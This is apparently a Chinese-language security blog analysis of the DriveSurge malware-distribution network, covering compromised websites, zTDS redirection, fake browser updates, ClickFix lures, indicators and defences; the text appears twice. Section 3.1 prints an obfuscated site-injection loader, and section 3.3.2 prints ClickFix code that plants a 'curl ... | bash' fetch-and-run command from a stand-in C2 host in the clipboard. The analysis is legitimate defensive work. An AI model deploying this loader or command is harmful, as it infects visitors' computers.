摘要2026年5月底一个名为DriveSurge的大规模恶意软件分发组织被安全研究人员曝光其通过攻陷数千个高信誉合法网站利用开源流量分发系统zTDS结合FakeUpdate虚假浏览器更新和ClickFix命令注入欺骗两大核心手法实现了低成本、高隐蔽、高收益的规模化攻击。本文将从技术角度深度解析DriveSurge的完整攻击链路、核心技术特点、基础设施指纹并提供针对性的防御策略同时对未来初始访问代理(IAB)的发展趋势进行前瞻性分析。一、引言当你信任的网站变成了毒窝想象一下这样的场景你正在浏览一个经常访问的本地新闻网站、企业官网或者专业资讯平台突然弹出一个看起来非常正规的Chrome浏览器更新提示或者一个验证人机以继续访问的窗口。你按照提示点击了立即更新按钮或者复制粘贴了所谓的验证命令——就在这一瞬间你的电脑已经被植入了恶意软件成为了黑客手中的肉鸡。这不是科幻小说而是正在全球范围内大规模发生的真实攻击。2026年5月30日Silent Push安全研究团队正式曝光了DriveSurge威胁组织该组织自2025年9月以来已经攻陷了数千个合法网站将它们变成了恶意软件分发的桥头堡。与传统的钓鱼网站不同DriveSurge的攻击入口都是用户日常信任的正规网站这使得其欺骗性极强普通用户几乎无法分辨。更可怕的是DriveSurge采用了高度商业化的运作模式专注于提供初始访问服务将成功感染的设备转卖给下游的勒索软件、挖矿、盗号等黑产团伙形成了一条完整的黑色产业链。二、DriveSurge组织身份与商业模式2.1 核心身份专业的初始访问代理(IAB)DriveSurge的核心身份是初始访问代理(Initial Access Broker, IAB)这是近年来网络黑产中发展最快的一个细分领域。IAB不直接进行最终的恶意活动而是专注于攻破目标系统的第一道防线——获取初始访问权限然后将这些权限出售给其他更专业的黑产团伙。2.2 商业模式按安装付费(PPI)DriveSurge采用**按安装付费(Pay-Per-Install, PPI)**的商业模式每成功感染一台设备就从下游买家那里获得一笔费用感染的设备价值根据设备类型、地理位置、所属行业等因素定价企业设备、金融行业设备、政府机构设备的价格远高于普通个人设备下游买家可以根据自己的需求定制投放目标和最终载荷类型这种商业模式使得DriveSurge可以专注于优化感染效率而下游黑产团伙则可以专注于优化变现效率极大地降低了网络攻击的门槛提高了攻击的规模化程度。三、完整攻击链路深度解析DriveSurge的攻击链路设计得非常精巧分为四个主要阶段网站入侵→流量分发→社会工程学诱导→载荷执行。否是Windows用户macOS用户用户访问合法网站被注入的恶意JS脚本执行重定向到zTDS流量分发系统zTDS对用户进行精准画像判断是否为目标用户正常显示网站内容选择最佳诱饵类型FakeUpdate虚假浏览器更新ClickFix命令注入欺骗用户下载恶意EXE/ZIP文件用户复制粘贴恶意命令执行恶意载荷多阶段下载器规避杀软植入最终恶意软件设备成为肉鸡转卖给下游黑产3.1 第一阶段批量攻陷正规网站DriveSurge攻击的第一步也是最关键的一步是批量攻陷高信誉的合法网站。根据Silent Push的研究被攻陷的网站涵盖了新闻资讯、中小企业官网、专业服务机构、医疗健康等多个领域。入侵手法利用网站CMS系统(如WordPress、Joomla等)的已知漏洞暴力破解网站管理员账户密码利用第三方插件和主题的漏洞供应链攻击通过感染网站使用的第三方服务进行传播注入方式一旦成功入侵网站DriveSurge会在网站的所有页面中注入一段恶意JavaScript脚本。这段脚本非常小并且经过了高度混淆网站所有者和普通访客完全无法察觉。以下是从被攻陷网站中提取的恶意JS注入代码示例(已脱敏)// DriveSurge恶意JS注入代码示例// 检查是否已经运行过并且用户不是WordPress管理员if(!window.__performance_optimizer_v6(window.__performance_optimizer_v6true,!/wordpress_logged_in_/.test(document.cookie))){// 编码后的zTDS域名列表varurls[aHR0cHM6Ly9uZXd0ZHNvbmUuc2hvcA,// newtdsone.shopL2pzcmVwbz9ybmQ9,// /jsrepo?rndaHR0cHM6Ly9jcHRvcHRpb3VzLmNvbQ,// cptoptious.comL2pzcmVwbz9ybmQ9,// /jsrepo?rndaHR0cHM6Ly9jYXB0aW90by5jb20// captioto.com];// 组合URL并注入恶意脚本functioninjectScript(url){varscriptdocument.createElement(script);script.srcatob(url)Math.random();script.asynctrue;document.head.appendChild(script);}// 故障转移机制如果第一个域名不可用尝试下一个vari0;functiontryNext(){if(iurls.length){injectScript(urls[i]urls[i1]);i2;setTimeout(tryNext,3000);}}tryNext();}这段代码有几个值得注意的特点管理员过滤不会对网站管理员展示恶意内容避免被发现Base64编码所有恶意域名都经过Base64编码增加了静态检测的难度故障转移内置了多个备份域名如果一个域名被屏蔽会自动尝试下一个异步加载恶意脚本异步加载不会影响网站的正常加载速度3.2 第二阶段zTDS智能流量分发系统当用户访问被攻陷的网站时恶意JS脚本会将用户重定向到DriveSurge的zTDS流量分发系统。zTDS是一个开源的流量分发系统自2015年就已经存在DriveSurge从2025年9月开始大规模使用它。zTDS的核心功能精准用户画像收集用户的操作系统、浏览器版本、IP地址、地理位置、UA信息等智能流量过滤过滤掉搜索引擎爬虫、安全厂商扫描器、VPN用户等非目标流量诱饵动态选择根据用户的操作系统和浏览器类型选择最合适的诱饵类型负载均衡将流量分配到不同的恶意服务器避免单点故障统计与计费统计每个被攻陷网站的感染数量用于与下游买家结算zTDS的技术特点支持按国家、地区、ASN、IP段进行黑白名单过滤内置了大量的爬虫和机器人签名库支持自定义诱饵页面和重定向规则提供详细的访问日志和统计报表可以通过API与其他系统集成3.3 第三阶段两大核心社会工程学诱饵经过zTDS的筛选和判断后目标用户会被导向两种不同类型的诱饵页面FakeUpdate虚假浏览器更新和ClickFix命令注入欺骗。3.3.1 FakeUpdate虚假浏览器更新FakeUpdate是DriveSurge最常用的诱饵类型主要针对Windows用户。它会伪装成各种主流浏览器的更新提示诱导用户下载恶意文件。图1DriveSurge使用的虚假Firefox更新页面技术细节支持伪装Chrome、Firefox、Edge、Safari、Opera、Brave等11种主流浏览器页面设计与官方更新页面几乎一模一样包含浏览器logo、版本号、更新说明等下载的文件通常是一个ZIP压缩包里面包含多个DLL文件和一个名为Browser Update.exe的恶意可执行文件恶意文件通常使用DLL侧加载技术伪装成合法的系统进程典型的ZIP包内容Browser Update.zip ├── Browser Update.exe (恶意主程序) ├── chrome_elf.dll (恶意DLL) ├── libEGL.dll (恶意DLL) ├── libGLESv2.dll (恶意DLL) └── v8_context_snapshot.bin (恶意数据文件)3.3.2 ClickFix命令注入欺骗ClickFix是一种更加隐蔽和危险的攻击手法主要针对macOS用户和技术水平较高的Windows用户。它会伪装成浏览器错误修复、“人机验证”、访问限制解除等提示诱导用户复制粘贴并执行恶意命令。技术细节当用户点击虚假的我不是机器人复选框时JavaScript会自动劫持用户的剪贴板将恶意命令复制到剪贴板中然后弹出一个窗口指示用户打开终端或PowerShell粘贴并执行所谓的验证代码恶意命令通常经过Base64编码用户无法直接看出其真实功能命令执行后会在内存中下载并执行恶意载荷不会在磁盘上留下明显的痕迹以下是DriveSurge使用的macOS版ClickFix恶意命令生成代码// DriveSurge macOS版ClickFix命令生成代码functiongenerateMaliciousCommand(remoteUrl,verificationId){// 生成随机文件名varrandomFileMath.random().toString(36).substring(7);// 恶意命令下载并执行载荷然后删除自身varshellCmdcd /tmp curl -kfsSL ${remoteUrl} -o${randomFile} bash${randomFile} rm -f${randomFile};// Base64编码varencodedCmdbtoa(unescape(encodeURIComponent(shellCmd)));// 伪装成验证IDreturnecho I am not a robot - reCAPTCHA Verification ID:${verificationId} | base64 -D | bash;}// 剪贴板劫持逻辑document.getElementById(captcha-checkbox).addEventListener(click,function(){varmaliciousCmdgenerateMaliciousCommand(https://malicious-c2.com/payload.sh,12345678-1234-5678-1234-567812345678);// 复制恶意命令到剪贴板navigator.clipboard.writeText(maliciousCmd).then(function(){// 显示诱导窗口showInstructionModal();});});3.4 第四阶段多阶段载荷执行一旦用户点击了恶意文件或者执行了恶意命令攻击就进入了最后阶段——载荷执行。多阶段下载过程第一阶段初始下载器通常是一个很小的可执行文件或脚本主要功能是与C2服务器建立连接第二阶段从C2服务器下载更复杂的下载器负责绕过杀毒软件和安全防护第三阶段下载最终的恶意载荷如远控木马、勒索病毒、挖矿程序、信息窃取器等反检测技术DLL侧加载利用合法的签名程序加载恶意DLL进程注入将恶意代码注入到合法的系统进程中运行无文件攻击尽可能在内存中执行不落地到磁盘代码混淆对恶意代码进行多层混淆和加密沙箱检测检测是否运行在虚拟机或沙箱环境中如果是则不执行恶意代码四、DriveSurge的技术指纹与基础设施为了帮助安全研究人员和防御者识别和追踪DriveSurge的活动Silent Push研究团队总结出了8个关键技术指纹指纹编号指纹类型具体特征1恶意注入脚本文件名t.js参数site[32位十六进制字符串]2恶意注入脚本文件名t.[12位十六进制字符串].js12位字符串为文件SHA256的前12位3恶意注入脚本文件名ext(-b)?.[12位十六进制字符串].js4服务器配置Nginx/1.27.2特定JARM指纹和HTTP头5域名模式TLD多为.icu使用特定的DNS服务器和注册商6WHOIS信息注册邮箱thiagorivera197151[]ycyfugihih[.]cfd7WHOIS信息注册邮箱samuel_jordan16[]flixtrend[.]net8zTDS特征路径/jsrepo?rnd公开的changelog.txt文件基础设施特点使用**防弹主机(Bulletproof Hosting)**服务难以被关停频繁更换域名和IP地址逃避追踪和屏蔽注册域名使用临时邮箱和虚假信息服务器分布在多个国家和地区避免单点故障五、全方位防御策略5.1 普通用户侧防御针对普通用户防御DriveSurge攻击的核心是提高安全意识拒绝社会工程学诱导✅绝对不要相信网页弹窗的浏览器更新浏览器更新永远只通过浏览器内置的关于→检查更新功能进行任何网页上弹出的浏览器需要更新提示都是假的✅绝不随意复制运行网页给出的命令无论是PowerShell、终端还是命令提示符任何要求你复制粘贴命令的网页提示都是可疑的✅加强浏览器安全防护保持浏览器和所有插件为最新版本安装可靠的广告拦截器和恶意脚本拦截扩展(如uBlock Origin、NoScript)开启浏览器的安全浏览功能✅系统与软件安全及时安装系统和软件的安全补丁使用可靠的杀毒软件和防火墙不要从非官方渠道下载软件5.2 网站运营侧防御对于网站运营者防御的核心是防止网站被入侵及时发现并清除恶意注入✅定期安全审计每周至少审计一次网站代码排查陌生的JS脚本和iframe特别注意网站的页脚、头部和所有公共页面使用安全扫描工具定期扫描网站漏洞✅严格权限管控遵循最小权限原则只给网站账户必要的权限使用强密码并定期更换开启双因素认证(2FA)禁止使用默认的管理员用户名✅部署安全防护设备部署Web应用防火墙(WAF)拦截异常的注入和访问请求使用CDN服务隐藏真实服务器IP开启服务器的入侵检测系统(IDS)和入侵防御系统(IPS)✅定期备份与应急响应定期备份网站数据和数据库制定详细的应急响应预案一旦发现被入侵立即隔离服务器清除恶意代码并修复漏洞六、未来趋势与前瞻性分析DriveSurge的出现标志着初始访问代理(IAB)已经发展到了一个新的阶段。未来这类攻击将会呈现出以下几个趋势6.1 攻击更加规模化和自动化随着AI技术的发展IAB将会利用AI来自动化网站漏洞扫描、入侵和恶意代码注入过程攻击规模将会呈指数级增长。同时AI也会被用于生成更加逼真的社会工程学诱饵提高攻击的成功率。6.2 攻击目标更加精准未来的IAB将会更加注重攻击的质量而不是数量。他们会利用大数据和AI技术对目标用户进行更加精准的画像只针对高价值的企业和个人用户进行攻击提高单次攻击的收益。6.3 攻击手法更加隐蔽为了逃避检测IAB将会不断创新攻击手法。我们可能会看到更多的无文件攻击、Living-off-the-Land(LotL)攻击、供应链攻击等。同时利用AI生成的恶意代码将会更加难以被传统的杀毒软件检测到。6.4 黑产产业链更加完善未来的网络黑产将会形成更加专业化、分工明确的产业链。IAB专注于初始访问勒索软件团伙专注于加密和勒索数据窃取团伙专注于数据盗窃和贩卖洗钱团伙专注于资金转移。这种专业化的分工将会使得网络攻击更加难以防范和打击。七、总结DriveSurge是2026年迄今为止最危险的恶意软件分发组织之一。它通过攻陷正规网站利用zTDS流量分发系统结合FakeUpdate和ClickFix两大社会工程学手法实现了规模化、高隐蔽性的攻击。对于普通用户来说防御DriveSurge攻击的关键是提高安全意识记住两个核心原则不相信网页弹窗的更新不复制运行网页给的命令。对于网站运营者来说防御的关键是加强网站安全防护定期审计代码及时修复漏洞。随着网络黑产的不断发展初始访问代理将会成为未来网络安全的主要威胁之一。我们需要不断提高安全防护水平加强安全意识教育才能有效应对这些日益复杂和危险的网络攻击。
DriveSurge深度解析:2026年最危险的“正规网站“恶意软件分发网络
发布时间:2026/6/2 18:56:41
摘要2026年5月底一个名为DriveSurge的大规模恶意软件分发组织被安全研究人员曝光其通过攻陷数千个高信誉合法网站利用开源流量分发系统zTDS结合FakeUpdate虚假浏览器更新和ClickFix命令注入欺骗两大核心手法实现了低成本、高隐蔽、高收益的规模化攻击。本文将从技术角度深度解析DriveSurge的完整攻击链路、核心技术特点、基础设施指纹并提供针对性的防御策略同时对未来初始访问代理(IAB)的发展趋势进行前瞻性分析。一、引言当你信任的网站变成了毒窝想象一下这样的场景你正在浏览一个经常访问的本地新闻网站、企业官网或者专业资讯平台突然弹出一个看起来非常正规的Chrome浏览器更新提示或者一个验证人机以继续访问的窗口。你按照提示点击了立即更新按钮或者复制粘贴了所谓的验证命令——就在这一瞬间你的电脑已经被植入了恶意软件成为了黑客手中的肉鸡。这不是科幻小说而是正在全球范围内大规模发生的真实攻击。2026年5月30日Silent Push安全研究团队正式曝光了DriveSurge威胁组织该组织自2025年9月以来已经攻陷了数千个合法网站将它们变成了恶意软件分发的桥头堡。与传统的钓鱼网站不同DriveSurge的攻击入口都是用户日常信任的正规网站这使得其欺骗性极强普通用户几乎无法分辨。更可怕的是DriveSurge采用了高度商业化的运作模式专注于提供初始访问服务将成功感染的设备转卖给下游的勒索软件、挖矿、盗号等黑产团伙形成了一条完整的黑色产业链。二、DriveSurge组织身份与商业模式2.1 核心身份专业的初始访问代理(IAB)DriveSurge的核心身份是初始访问代理(Initial Access Broker, IAB)这是近年来网络黑产中发展最快的一个细分领域。IAB不直接进行最终的恶意活动而是专注于攻破目标系统的第一道防线——获取初始访问权限然后将这些权限出售给其他更专业的黑产团伙。2.2 商业模式按安装付费(PPI)DriveSurge采用**按安装付费(Pay-Per-Install, PPI)**的商业模式每成功感染一台设备就从下游买家那里获得一笔费用感染的设备价值根据设备类型、地理位置、所属行业等因素定价企业设备、金融行业设备、政府机构设备的价格远高于普通个人设备下游买家可以根据自己的需求定制投放目标和最终载荷类型这种商业模式使得DriveSurge可以专注于优化感染效率而下游黑产团伙则可以专注于优化变现效率极大地降低了网络攻击的门槛提高了攻击的规模化程度。三、完整攻击链路深度解析DriveSurge的攻击链路设计得非常精巧分为四个主要阶段网站入侵→流量分发→社会工程学诱导→载荷执行。否是Windows用户macOS用户用户访问合法网站被注入的恶意JS脚本执行重定向到zTDS流量分发系统zTDS对用户进行精准画像判断是否为目标用户正常显示网站内容选择最佳诱饵类型FakeUpdate虚假浏览器更新ClickFix命令注入欺骗用户下载恶意EXE/ZIP文件用户复制粘贴恶意命令执行恶意载荷多阶段下载器规避杀软植入最终恶意软件设备成为肉鸡转卖给下游黑产3.1 第一阶段批量攻陷正规网站DriveSurge攻击的第一步也是最关键的一步是批量攻陷高信誉的合法网站。根据Silent Push的研究被攻陷的网站涵盖了新闻资讯、中小企业官网、专业服务机构、医疗健康等多个领域。入侵手法利用网站CMS系统(如WordPress、Joomla等)的已知漏洞暴力破解网站管理员账户密码利用第三方插件和主题的漏洞供应链攻击通过感染网站使用的第三方服务进行传播注入方式一旦成功入侵网站DriveSurge会在网站的所有页面中注入一段恶意JavaScript脚本。这段脚本非常小并且经过了高度混淆网站所有者和普通访客完全无法察觉。以下是从被攻陷网站中提取的恶意JS注入代码示例(已脱敏)// DriveSurge恶意JS注入代码示例// 检查是否已经运行过并且用户不是WordPress管理员if(!window.__performance_optimizer_v6(window.__performance_optimizer_v6true,!/wordpress_logged_in_/.test(document.cookie))){// 编码后的zTDS域名列表varurls[aHR0cHM6Ly9uZXd0ZHNvbmUuc2hvcA,// newtdsone.shopL2pzcmVwbz9ybmQ9,// /jsrepo?rndaHR0cHM6Ly9jcHRvcHRpb3VzLmNvbQ,// cptoptious.comL2pzcmVwbz9ybmQ9,// /jsrepo?rndaHR0cHM6Ly9jYXB0aW90by5jb20// captioto.com];// 组合URL并注入恶意脚本functioninjectScript(url){varscriptdocument.createElement(script);script.srcatob(url)Math.random();script.asynctrue;document.head.appendChild(script);}// 故障转移机制如果第一个域名不可用尝试下一个vari0;functiontryNext(){if(iurls.length){injectScript(urls[i]urls[i1]);i2;setTimeout(tryNext,3000);}}tryNext();}这段代码有几个值得注意的特点管理员过滤不会对网站管理员展示恶意内容避免被发现Base64编码所有恶意域名都经过Base64编码增加了静态检测的难度故障转移内置了多个备份域名如果一个域名被屏蔽会自动尝试下一个异步加载恶意脚本异步加载不会影响网站的正常加载速度3.2 第二阶段zTDS智能流量分发系统当用户访问被攻陷的网站时恶意JS脚本会将用户重定向到DriveSurge的zTDS流量分发系统。zTDS是一个开源的流量分发系统自2015年就已经存在DriveSurge从2025年9月开始大规模使用它。zTDS的核心功能精准用户画像收集用户的操作系统、浏览器版本、IP地址、地理位置、UA信息等智能流量过滤过滤掉搜索引擎爬虫、安全厂商扫描器、VPN用户等非目标流量诱饵动态选择根据用户的操作系统和浏览器类型选择最合适的诱饵类型负载均衡将流量分配到不同的恶意服务器避免单点故障统计与计费统计每个被攻陷网站的感染数量用于与下游买家结算zTDS的技术特点支持按国家、地区、ASN、IP段进行黑白名单过滤内置了大量的爬虫和机器人签名库支持自定义诱饵页面和重定向规则提供详细的访问日志和统计报表可以通过API与其他系统集成3.3 第三阶段两大核心社会工程学诱饵经过zTDS的筛选和判断后目标用户会被导向两种不同类型的诱饵页面FakeUpdate虚假浏览器更新和ClickFix命令注入欺骗。3.3.1 FakeUpdate虚假浏览器更新FakeUpdate是DriveSurge最常用的诱饵类型主要针对Windows用户。它会伪装成各种主流浏览器的更新提示诱导用户下载恶意文件。图1DriveSurge使用的虚假Firefox更新页面技术细节支持伪装Chrome、Firefox、Edge、Safari、Opera、Brave等11种主流浏览器页面设计与官方更新页面几乎一模一样包含浏览器logo、版本号、更新说明等下载的文件通常是一个ZIP压缩包里面包含多个DLL文件和一个名为Browser Update.exe的恶意可执行文件恶意文件通常使用DLL侧加载技术伪装成合法的系统进程典型的ZIP包内容Browser Update.zip ├── Browser Update.exe (恶意主程序) ├── chrome_elf.dll (恶意DLL) ├── libEGL.dll (恶意DLL) ├── libGLESv2.dll (恶意DLL) └── v8_context_snapshot.bin (恶意数据文件)3.3.2 ClickFix命令注入欺骗ClickFix是一种更加隐蔽和危险的攻击手法主要针对macOS用户和技术水平较高的Windows用户。它会伪装成浏览器错误修复、“人机验证”、访问限制解除等提示诱导用户复制粘贴并执行恶意命令。技术细节当用户点击虚假的我不是机器人复选框时JavaScript会自动劫持用户的剪贴板将恶意命令复制到剪贴板中然后弹出一个窗口指示用户打开终端或PowerShell粘贴并执行所谓的验证代码恶意命令通常经过Base64编码用户无法直接看出其真实功能命令执行后会在内存中下载并执行恶意载荷不会在磁盘上留下明显的痕迹以下是DriveSurge使用的macOS版ClickFix恶意命令生成代码// DriveSurge macOS版ClickFix命令生成代码functiongenerateMaliciousCommand(remoteUrl,verificationId){// 生成随机文件名varrandomFileMath.random().toString(36).substring(7);// 恶意命令下载并执行载荷然后删除自身varshellCmdcd /tmp curl -kfsSL ${remoteUrl} -o${randomFile} bash${randomFile} rm -f${randomFile};// Base64编码varencodedCmdbtoa(unescape(encodeURIComponent(shellCmd)));// 伪装成验证IDreturnecho I am not a robot - reCAPTCHA Verification ID:${verificationId} | base64 -D | bash;}// 剪贴板劫持逻辑document.getElementById(captcha-checkbox).addEventListener(click,function(){varmaliciousCmdgenerateMaliciousCommand(https://malicious-c2.com/payload.sh,12345678-1234-5678-1234-567812345678);// 复制恶意命令到剪贴板navigator.clipboard.writeText(maliciousCmd).then(function(){// 显示诱导窗口showInstructionModal();});});3.4 第四阶段多阶段载荷执行一旦用户点击了恶意文件或者执行了恶意命令攻击就进入了最后阶段——载荷执行。多阶段下载过程第一阶段初始下载器通常是一个很小的可执行文件或脚本主要功能是与C2服务器建立连接第二阶段从C2服务器下载更复杂的下载器负责绕过杀毒软件和安全防护第三阶段下载最终的恶意载荷如远控木马、勒索病毒、挖矿程序、信息窃取器等反检测技术DLL侧加载利用合法的签名程序加载恶意DLL进程注入将恶意代码注入到合法的系统进程中运行无文件攻击尽可能在内存中执行不落地到磁盘代码混淆对恶意代码进行多层混淆和加密沙箱检测检测是否运行在虚拟机或沙箱环境中如果是则不执行恶意代码四、DriveSurge的技术指纹与基础设施为了帮助安全研究人员和防御者识别和追踪DriveSurge的活动Silent Push研究团队总结出了8个关键技术指纹指纹编号指纹类型具体特征1恶意注入脚本文件名t.js参数site[32位十六进制字符串]2恶意注入脚本文件名t.[12位十六进制字符串].js12位字符串为文件SHA256的前12位3恶意注入脚本文件名ext(-b)?.[12位十六进制字符串].js4服务器配置Nginx/1.27.2特定JARM指纹和HTTP头5域名模式TLD多为.icu使用特定的DNS服务器和注册商6WHOIS信息注册邮箱thiagorivera197151[]ycyfugihih[.]cfd7WHOIS信息注册邮箱samuel_jordan16[]flixtrend[.]net8zTDS特征路径/jsrepo?rnd公开的changelog.txt文件基础设施特点使用**防弹主机(Bulletproof Hosting)**服务难以被关停频繁更换域名和IP地址逃避追踪和屏蔽注册域名使用临时邮箱和虚假信息服务器分布在多个国家和地区避免单点故障五、全方位防御策略5.1 普通用户侧防御针对普通用户防御DriveSurge攻击的核心是提高安全意识拒绝社会工程学诱导✅绝对不要相信网页弹窗的浏览器更新浏览器更新永远只通过浏览器内置的关于→检查更新功能进行任何网页上弹出的浏览器需要更新提示都是假的✅绝不随意复制运行网页给出的命令无论是PowerShell、终端还是命令提示符任何要求你复制粘贴命令的网页提示都是可疑的✅加强浏览器安全防护保持浏览器和所有插件为最新版本安装可靠的广告拦截器和恶意脚本拦截扩展(如uBlock Origin、NoScript)开启浏览器的安全浏览功能✅系统与软件安全及时安装系统和软件的安全补丁使用可靠的杀毒软件和防火墙不要从非官方渠道下载软件5.2 网站运营侧防御对于网站运营者防御的核心是防止网站被入侵及时发现并清除恶意注入✅定期安全审计每周至少审计一次网站代码排查陌生的JS脚本和iframe特别注意网站的页脚、头部和所有公共页面使用安全扫描工具定期扫描网站漏洞✅严格权限管控遵循最小权限原则只给网站账户必要的权限使用强密码并定期更换开启双因素认证(2FA)禁止使用默认的管理员用户名✅部署安全防护设备部署Web应用防火墙(WAF)拦截异常的注入和访问请求使用CDN服务隐藏真实服务器IP开启服务器的入侵检测系统(IDS)和入侵防御系统(IPS)✅定期备份与应急响应定期备份网站数据和数据库制定详细的应急响应预案一旦发现被入侵立即隔离服务器清除恶意代码并修复漏洞六、未来趋势与前瞻性分析DriveSurge的出现标志着初始访问代理(IAB)已经发展到了一个新的阶段。未来这类攻击将会呈现出以下几个趋势6.1 攻击更加规模化和自动化随着AI技术的发展IAB将会利用AI来自动化网站漏洞扫描、入侵和恶意代码注入过程攻击规模将会呈指数级增长。同时AI也会被用于生成更加逼真的社会工程学诱饵提高攻击的成功率。6.2 攻击目标更加精准未来的IAB将会更加注重攻击的质量而不是数量。他们会利用大数据和AI技术对目标用户进行更加精准的画像只针对高价值的企业和个人用户进行攻击提高单次攻击的收益。6.3 攻击手法更加隐蔽为了逃避检测IAB将会不断创新攻击手法。我们可能会看到更多的无文件攻击、Living-off-the-Land(LotL)攻击、供应链攻击等。同时利用AI生成的恶意代码将会更加难以被传统的杀毒软件检测到。6.4 黑产产业链更加完善未来的网络黑产将会形成更加专业化、分工明确的产业链。IAB专注于初始访问勒索软件团伙专注于加密和勒索数据窃取团伙专注于数据盗窃和贩卖洗钱团伙专注于资金转移。这种专业化的分工将会使得网络攻击更加难以防范和打击。七、总结DriveSurge是2026年迄今为止最危险的恶意软件分发组织之一。它通过攻陷正规网站利用zTDS流量分发系统结合FakeUpdate和ClickFix两大社会工程学手法实现了规模化、高隐蔽性的攻击。对于普通用户来说防御DriveSurge攻击的关键是提高安全意识记住两个核心原则不相信网页弹窗的更新不复制运行网页给的命令。对于网站运营者来说防御的关键是加强网站安全防护定期审计代码及时修复漏洞。随着网络黑产的不断发展初始访问代理将会成为未来网络安全的主要威胁之一。我们需要不断提高安全防护水平加强安全意识教育才能有效应对这些日益复杂和危险的网络攻击。
)
)
)
)
